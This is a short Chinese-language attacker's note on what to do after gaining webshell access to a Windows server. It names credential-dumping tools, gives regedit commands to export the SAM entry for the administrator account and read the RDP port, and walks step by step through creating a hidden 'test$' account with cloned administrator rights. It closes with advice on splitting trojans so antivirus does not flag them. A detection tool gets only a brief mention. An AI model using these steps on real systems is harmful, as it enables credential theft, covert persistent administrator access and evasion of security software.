WAF創建賬號繞過
除此之外要注意的,在有了webshell權限後在敏感操作(一些命令)時,例如360會有提示警告
解決
先取本地明文密碼哈希值
工具
lazagne
getpass
KIWICMD
可能可以讀到web站點中間件的IUSER賬戶(默認的匿名訪問)
採用註冊表導入導出的方法
兩個註冊表內容是是權限和密碼
也就是把管理員權限給一個咱們自己創建的知道密碼的賬戶
一、註冊表導出
命令行導出:
regedit /e c:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
安靜模式導入:regedit /s c:\test.reg
註冊表相關操作可查看:https://www.cnblogs.com/zmwgz/p/10826478.html
查看3389端口
先導出
regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
然後
查看導出的文件,再用find查帶這個PortNumber字段的3389端口
type c:\\tsport.reg | find "PortNumber"
二、建立隱藏帳號
1、CMD命令行下,建立了一個用戶名爲“test$”,密碼爲“abc123!”的簡單隱藏賬戶,並且把該隱藏賬戶提升爲了管理員權限。
PS:CMD命令行使用"net user",看不到"test$"這個賬號,但在控制面板和本地用戶和組是可以顯示此用戶的。
2、“開始”→“運行”,輸入“regedt32.exe”後回車,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,單機右建權限,把名叫:administrator的用戶給予:完全控制以及讀取的權限,在後面打勾就行,然後關閉註冊表編輯器,再次打開即可。
3、來到註冊表編輯器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”處,點擊test$用戶,得到在右邊顯示的鍵值中的“類型”一項顯示爲0x3ec,找到箭頭所指目錄。
4、扎到administrator所對應的的項爲“000001F4”,將“000001F4”的F值複製到“000003EC”的F值中,保存。
5、分別test$和“000003EC導出到桌面,刪除test$用戶 net user test$ /del
6、將剛纔導出的兩個後綴爲.reg的註冊表項導入註冊表中。這樣所謂的隱藏賬戶就創建好了。
使用D盾web查殺工具,使用克隆賬號檢測功能進行查看,可檢測出隱藏、克隆賬號,如果查不出來,可以克隆中間件帳號
補充
現在很多的木馬,運行過程中,以一些啓動項的形式(msconfig),或者以服務方式加載,以驅動方式加載,以註冊表加載,這裏面都是殺毒軟件在時刻監聽,一運行就會報警,因此,現在比較先進的木馬,都是先拆分開,綁定註冊表,分多次執行木馬,運行之後的木馬再導入註冊表(WINRAR高級功能中就可以實現)